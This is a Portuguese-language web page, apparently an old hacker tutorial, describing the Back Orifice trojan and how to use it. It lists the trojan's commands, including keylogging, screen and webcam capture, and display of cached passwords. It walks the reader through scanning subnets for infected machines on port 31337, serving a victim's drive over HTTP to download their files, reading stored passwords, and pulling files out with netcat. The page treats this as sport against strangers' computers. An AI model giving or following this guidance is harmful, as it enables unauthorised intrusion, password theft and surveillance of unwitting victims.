O que
é Back Orifice? |
Back
Orifice ou simplesmente BO, é um aplicativo cliente/servidor,
que permite ao cliente monitorar e administrar a máquina
rodando o servidor. Pode ser considerado como um Cavalo de Tróia
(Trojan).
|
Quem Criou
o Back Orifice? |
Foi
um Grupo de Hackers chamado "Culto da Vaca Morta".
|
Como ele
Funciona? |
Assim
como um browser conecta-se a um servidor da Internet para a visualização
de uma home page, compreendendo uma máquina cliente e outra
servidora, respectivamente, Assim é o Back Orifice, que utiliza-se
dos mesmos processos. A máquina que roda a versão
cliente pode conectar-se com uma máquina que roda a versão
servidora.
|
Quem são
os servidores e quem são os clientes? |
Na
grande maioria dos casos, a versão servidora é rodada
em uma máquina por simples descuido. Pois, acredito, que
ninguém gostaria de disponibilizar seus arquivos pessoais
para algumas milhares de pessoas no mundo. Como o programa BO vem
compactado, contendo além de alguns utilitários, as
versões cliente e servidor.
O usuário pode executar a versão errada (servidor),
simplesmente por não ter lido ou entendido as instruções.
Mas lembramos, quem está rodando o servidor do Back Orifice,
pelo menos, tentou rodar a versão cliente para, talvez, divertir-se
com a máquina dos outros.
E acabou tornando a si próprio, o brinquedo dos outros.
Para isso, basta um simples clique do mouse. E o servidor se instala
em sua máquina sem nada mostrar-lhe e em seguida se apaga
e passa a funcionar como um serviço do Windows.
E a cada vez que você liga o seu micro, o servidor se inicia
sem que ninguém perceba. Ele funciona como um pano de fundo
e não deixa nenhum rastro.
O seu funcionamento é como um controle remoto que depois
de instalado, o cliente pode tomar controle de todo o sistema: roubar
suas senhas, enviar ou receber arquivos, rodar novas aplicações,
observar e derrubar qualquer aplicação que você
esteja rodando, e etc...
|
Comandos |
App add/appadd |
Abre e redireciona um arquivo modo texto
para uma porta tcp. Isso permite que você controle o
aplicativo modo texto ou modo dos (como command.com) via telnet.
|
App Del/appdel |
Desliga o redirecionamento de um aplicativo.
|
Apps list/applist |
Lista os aplicativos atualmente conectados.
|
Directory create/md |
Cria diretório
|
Directory list/dir |
Lista arquivos e diretórios.
Você deve especificar um curinga caso queira que mais
de um arquivo seja listado. |
Directory remove/rd |
Remove um diretório |
Export add/sharedel |
Compartilha um diretório ou
drive do servidor em rede. O ícone diretório ou
drive compartilhado não é alterado. |
Export delete/sharedel |
Remove um compartilhamento |
Exports list/sharelist |
Lista os compartilhamentos, o drive
ou diretório que está sendo compartilhado, os
acessos e a senha do compartilhamento. |
File copy/copy |
Copia um arquivo. |
HTTP Enable/httpon |
Habilita o servidor http |
Keylog begin/keylog |
Registra o texto digitado no servidor em um arquivo texto.
O log mostra o nome da janela em que o texto foi digitado.
|
Keylog end
|
Interrompe o registro de texto digitado.
Para utilizar esse comando no modo texto, use o comando "Keylog
stop" |
MM Capture avi/capavi |
Captura vídeo e áudio
(se disponível) de um dispositivo de captura de vídeo
para um arquivo avi. |
MM Capture frame/capframe |
Captura um quadro de vídeo de
um dispositivo de captura de vídeo para um arquivo bitmap. |
MM Capture screen/capscren |
Captura uma imagem da tela do servidor
para um arquivo bitmap. |
MM List capture devices/listcaps |
Lista os dispositivos de captura de
vídeo. |
MM Play sound/sound |
Toca um arquivo wav no servidor |
Net connections/netlist |
Lista as conexões de entrada
e saída da rede. |
Net delete/netdisconnect |
Desconecta o servidor de uma rede. |
Net use/netconnect |
Conecta o servidor em uma rede. |
Net view/netview |
Lista todas as interfaces de rede,
domínios, servidores e envios do servidor. |
Ping host/ping |
Testa a conexão com a máquina remota. Informa
o nome da máquina e a versão do BO.
|
Plugin execute/pluginexec |
Executa um plugin do Back Orifice.
Executar funções não entendidas pelo plugin
pode fazer com que o servidor trave. |
Plugin Kill/pluginkill |
Desliga um plugin. |
Plugins list/pluginlist |
Lista plugins ativos ou avisa de que
um plugin foi desligado. |
Process Kill/prockill |
Termina um processo. |
Process list/proclist |
Lista processos rodando. |
Process spawn/procspawn |
Abre um programa. Pelo GUI, se o segundo
parâmetro é especificado, o processo será
executado normalmente e visível. Caso contrario ele será
executado de maneira invisível. |
Redir add/rediradd |
Redireciona recebimento de conexões
tcp ou pacotes udp para outros endereço ip. |
Redir Del/redirdel |
Interrompe o redirecionamento de uma
porta. |
Redir list/redirlist |
Lista os redirecionamentos de portas
ativos. |
Reg create key/regmakekey |
Cria uma chave no registro. NOTA: Para
todos os comandos de registro, não especificar a \\ inicial
de valores de registro. |
Reg delete key/regdelkey |
Remove uma chave no registro. |
Reg delete value/regdeval |
Remove um valor no registro |
Reg list keys/reglistkeys |
Lista as sub-chaves de uma chave de
registro. |
Reg list values/reglistvals |
Lista os valores de uma chave de registro. |
Reg set value/regsetval |
Define um valor para uma chave de registro. Os valores são
especificados no formato tipo virgula valor. Para valores
binários (tipo B) o valor é uma série
de dois dígitos hexadecimais. Para valores DWORD (tipo
D) o valor é um número decimal. Para valores
string (tipo S) o valor é uma string de texto.
|
Resolve host/resolve |
Determina o endereço ip de uma
máquina em relação à máquina
servidor. O nome da máquina pode ser um "host name"
ou o nome de uma máquina em rede local. |
System dialogbox/dialog |
Crie uma caixa de diálogo no servidor com o texto
informado e um botão OK. Você pode criar quantas
caixas de diálogo quiser, elas aparecerão em
cascata umas sobre as outras
|
System info/info |
Exibe as informações
do sistema da máquina servidor. Os dados exibidos incluem
nome da máquina, usuário, tipo de cpu, memória
total e disponível, dados sobre a versão de Windows
e informações sobre os drives, incluindo tipo
(fixo, cd-rom, removível ou remoto) e, nos drives fixos,
o tamanho e espaço disponível do drive. |
System lockup/lockup |
Trava a máquina servidor. |
System passwords/passes |
Exibe as senhas cacheadas e a senha do protetor de tela.
As senhas podem apresentar caracteres estranhos no fim.
|
System reboot/reboot |
Desliga o servidor e reinicia a máquina. |
TCP file receive/tcprecv |
Conecta o servidor a um ip e porta
específicos e gravo qualquer dado recebido por aquela
conexão em um arquivo. |
TCP file send/tcpsend |
Conecta o servidor a um ip e porta
específicos, envia o conteúdo do arquivo especificado
e o desconecta. Arquivos podem especificado e o desconecta.
Arquivos podem ser transferidos _do_ servidor usando-se o comando
"tcp file send" e o utilitário netcat com os
parâmetros: netcat -I - p 666> arquivo Arquivo podem
ser transferidos _para_ o servidor usando-se o comando "tcp
file receive" e o utilitário netcat com os parâmetros:
netcat -I -p 666 < arquivo NOTA: A versão para windows
do netcat não desconcerta nem se finaliza quando atinge
o final da transmissão. Após o término,
finalize o netcat com ctrl+c ou ctrl+break. |
Como
encontrar uma máquina rodando o servidor Back Orifice?? |
Você
pode faze-lo de duas formas. A primeira é digitando
o endereço de uma sub-rede na pequena caixa no canto
superior esquerdo. Ex. 195.219.222.* e pressionando Enter.
Isto fará com que o Back Orifice procure por todos
os endereços IP do 195.219.222.0 até o 195.219.222.255.
Você
pode também abrir o Notepad e criar uma lista de sub-redes
(uma por linha), salva-la no mesmo diretório do Bogui.exe
e então, pressionar o botão PING no cinto inferior
esquerdo da janela.
Agora
digite o nome do arquivo que você criou na caixa de
texto que surgirá.
O
Back Orifice irá então, buscar todas as sub-redes
do arquivo.
Como
Saberei que o Back Orifice encontrou uma máquina rodando
o servidor?
Quando
o Back Orifice detectar uma máquina rodando o servido,
ele irá mostrar uma mensagem como esta:
-------------------Packet
received from host 195.130.131.69 port 31337 ------------------
! PONG! 1.20!DEFAULT! ---------------------------------End
of Data----------------------------
Que
significa: " Pacote recebido do host (endereço
IP dp servidor) 195.130.131.69 porta 31337".
"Pong, significa a resposta ao seu comando Ping. O número
1.20 indica a versão do servidor Back Orifice e o nome
DEFAULT, é o nome do computador-servidor".
Digite
o endereço IP completo, encontrado na mesma caixa de
texto superior esquerda para começar a executar os
comandos.
|
Como
posso ver e baixar os arquivos do winchester do Servidor? |
Nada
mais fácil! Apenas selecione o comando "HTTP Enabled"
na janela do Bogui, digite "80" (ou outro número)
na caixa de texto "port" e "c:" (ou outra
letra do drive) na caixa "root". Então, pressione
o botão "send".
Você
deverá ver uma mensagem como esta:
**15:HTTP
Enable packet send (25bytes) val: '80' val2: 'c:' -----------------Packet
received from host 195.130.131.69 port 31337 -------------------HTTP
server listening on port 80 ----------------------------End
of Data ----------------------------
Agora
simplesmente, abra um Browser (Netscape Navigator funciona
melhor neste caso, mas o Internet Explorer também vai
servir). No campo de endereço, digite: "http://endereçodoip"
. No caso acima, seria: "http://195.130.131.69"
Se
você utilizou um número diferente de "80"
para a porta, então adicione-o ao endereço de
IP. Ex. "http://195.130.131.69:3000".
Pronto!
Agora você poderá visualizar o conteúdo
do drive C: \ do servidor na janela do seu browser. Clicando
em um diretório, você será transferido
para ele. Clicando nos arquivos, você os baixará.
Veja
as Senhas do Usuário Armazenadas no Servidor.
Talvez
esta seja a mais simples das funções. Apenas
clique no comando "System passwords" e pronto, as
senhas aparecerão para você!
|
|
|